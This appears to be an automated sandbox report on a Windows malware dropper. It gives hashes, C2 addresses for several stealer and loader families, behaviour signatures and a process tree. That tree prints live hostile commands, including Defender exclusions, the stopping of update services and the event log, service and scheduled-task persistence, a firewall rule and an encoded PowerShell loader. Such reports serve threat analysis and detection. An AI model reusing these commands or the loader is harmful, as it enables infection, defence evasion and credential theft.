Analysis

  • max time kernel
    102s
  • max time network
    158s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-05-2024 20:45

General

  • Target

    a2b1d5318495caa8dfaa18d6af6a999b5f17fb8777c049fc221af614c49dc843.exe

  • Size

    1.6MB

  • MD5

    49d0c80c22b94e1553696070e54ac1e2

  • SHA1

    7339729015cc3df778b0b1bbf3910e5db299f5a1

  • SHA256

    a2b1d5318495caa8dfaa18d6af6a999b5f17fb8777c049fc221af614c49dc843

  • SHA512

    ffd657915e947e7c99c2c5203cbf03a50e3d5aadbaabd7e5173635b533a7f87707477e4f2d4db38c1e4b4e522cb0de5f9f23fee0e2a86fa2ea4e6a38aa8fdd07

  • SSDEEP

    49152:TanuwqwnNW952C2CJqrWOUjgANn7FgkhaISs+:WA0Np7+qaOs9JgRi+

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Extracted

Family

gcleaner

C2

185.172.128.90

5.42.64.56

5.42.65.64

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 45 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 48 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 19 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 24 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a2b1d5318495caa8dfaa18d6af6a999b5f17fb8777c049fc221af614c49dc843.exe
    "C:\Users\Admin\AppData\Local\Temp\a2b1d5318495caa8dfaa18d6af6a999b5f17fb8777c049fc221af614c49dc843.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4692
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:1268
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:4344
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4980
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:4056
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:864
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2660
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:72
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                  7⤵
                    PID:992
                    • C:\Windows\SysWOW64\choice.exe
                      choice /C Y /N /D Y /T 3
                      8⤵
                        PID:1752
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 392
                    6⤵
                    • Program crash
                    PID:1100
                • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:5052
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                      PID:2728
                  • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4700
                  • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious use of WriteProcessMemory
                    PID:1848
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4488
                      • C:\Windows\SysWOW64\sc.exe
                        Sc stop GameServerClient
                        7⤵
                        • Launches sc.exe
                        PID:2460
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameServerClient confirm
                        7⤵
                        • Executes dropped EXE
                        PID:2392
                      • C:\Windows\SysWOW64\sc.exe
                        Sc delete GameSyncLink
                        7⤵
                        • Launches sc.exe
                        PID:4536
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameSyncLink confirm
                        7⤵
                        • Executes dropped EXE
                        PID:2080
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:3756
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService start GameSyncLink
                        7⤵
                        • Executes dropped EXE
                        PID:4680
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                      6⤵
                        PID:3136
                        • C:\Windows\SysWOW64\sc.exe
                          Sc stop GameServerClientC
                          7⤵
                          • Launches sc.exe
                          PID:2728
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove GameServerClientC confirm
                          7⤵
                          • Executes dropped EXE
                          PID:4944
                        • C:\Windows\SysWOW64\sc.exe
                          Sc delete PiercingNetLink
                          7⤵
                          • Launches sc.exe
                          PID:2692
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService remove PiercingNetLink confirm
                          7⤵
                          • Executes dropped EXE
                          PID:2364
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:3736
                        • C:\Program Files (x86)\GameSyncLink\GameService.exe
                          GameService start PiercingNetLink
                          7⤵
                          • Executes dropped EXE
                          PID:752
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                        6⤵
                          PID:804
                          • C:\Windows\SysWOW64\sc.exe
                            Sc delete GameSyncLinks
                            7⤵
                            • Launches sc.exe
                            PID:4532
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService remove GameSyncLinks confirm
                            7⤵
                            • Executes dropped EXE
                            PID:492
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:2680
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService start GameSyncLinks
                            7⤵
                            • Executes dropped EXE
                            PID:4804
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                          6⤵
                            PID:2840
                        • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:3640
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            6⤵
                              PID:3608
                          • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3972
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                                PID:1720
                            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                              5⤵
                              • Executes dropped EXE
                              PID:1556
                              • C:\Windows\SysWOW64\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                6⤵
                                • Creates scheduled task(s)
                                PID:4192
                              • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                                6⤵
                                • Executes dropped EXE
                                PID:2392
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 480
                                  7⤵
                                  • Program crash
                                  PID:4412
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 504
                                  7⤵
                                  • Program crash
                                  PID:2492
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 780
                                  7⤵
                                  • Program crash
                                  PID:3480
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 788
                                  7⤵
                                  • Program crash
                                  PID:1256
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 872
                                  7⤵
                                  • Program crash
                                  PID:3856
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 880
                                  7⤵
                                  • Program crash
                                  PID:2080
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 1048
                                  7⤵
                                  • Program crash
                                  PID:1252
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 1064
                                  7⤵
                                  • Program crash
                                  PID:2400
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 1152
                                  7⤵
                                  • Program crash
                                  PID:556
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 1400
                                  7⤵
                                  • Program crash
                                  PID:1584
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe" & exit
                                  7⤵
                                    PID:4976
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im "dl.exe" /f
                                      8⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:4868
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2392 -s 1476
                                    7⤵
                                    • Program crash
                                    PID:4852
                                • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  PID:3584
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3584 -s 388
                                    7⤵
                                    • Program crash
                                    PID:4180
                                • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:3996
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    PID:724
                                  • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                    7⤵
                                      PID:5672
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        8⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        PID:1848
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                        8⤵
                                          PID:5332
                                          • C:\Windows\system32\netsh.exe
                                            netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                            9⤵
                                            • Modifies Windows Firewall
                                            PID:5288
                                    • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4364
                                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        7⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1088
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        7⤵
                                          PID:1176
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            8⤵
                                              PID:3216
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop UsoSvc
                                            7⤵
                                            • Launches sc.exe
                                            PID:4620
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                            7⤵
                                            • Launches sc.exe
                                            PID:2552
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop wuauserv
                                            7⤵
                                            • Launches sc.exe
                                            PID:4484
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop bits
                                            7⤵
                                            • Launches sc.exe
                                            PID:400
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop dosvc
                                            7⤵
                                            • Launches sc.exe
                                            PID:4736
                                          • C:\Windows\system32\powercfg.exe
                                            C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                            7⤵
                                              PID:5000
                                            • C:\Windows\system32\powercfg.exe
                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                              7⤵
                                                PID:572
                                              • C:\Windows\system32\powercfg.exe
                                                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                7⤵
                                                  PID:4956
                                                • C:\Windows\system32\powercfg.exe
                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                  7⤵
                                                    PID:3448
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe delete "WSNKISKT"
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:1716
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:2324
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop eventlog
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:2388
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe start "WSNKISKT"
                                                    7⤵
                                                    • Launches sc.exe
                                                    PID:960
                                              • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                                "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                                5⤵
                                                • Executes dropped EXE
                                                PID:4424
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                  6⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious use of SetThreadContext
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1788
                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                                                    7⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2644
                                                    • C:\Users\Admin\Pictures\RqNf4VbygaZMscPSdJ09c7tQ.exe
                                                      "C:\Users\Admin\Pictures\RqNf4VbygaZMscPSdJ09c7tQ.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      PID:4532
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 480
                                                        9⤵
                                                        • Program crash
                                                        PID:2628
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 500
                                                        9⤵
                                                        • Program crash
                                                        PID:1044
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 788
                                                        9⤵
                                                        • Program crash
                                                        PID:2316
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 808
                                                        9⤵
                                                        • Program crash
                                                        PID:3984
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 848
                                                        9⤵
                                                        • Program crash
                                                        PID:1044
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 856
                                                        9⤵
                                                        • Program crash
                                                        PID:4868
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1048
                                                        9⤵
                                                        • Program crash
                                                        PID:1680
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1060
                                                        9⤵
                                                        • Program crash
                                                        PID:3216
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4532 -s 1140
                                                        9⤵
                                                        • Program crash
                                                        PID:5264
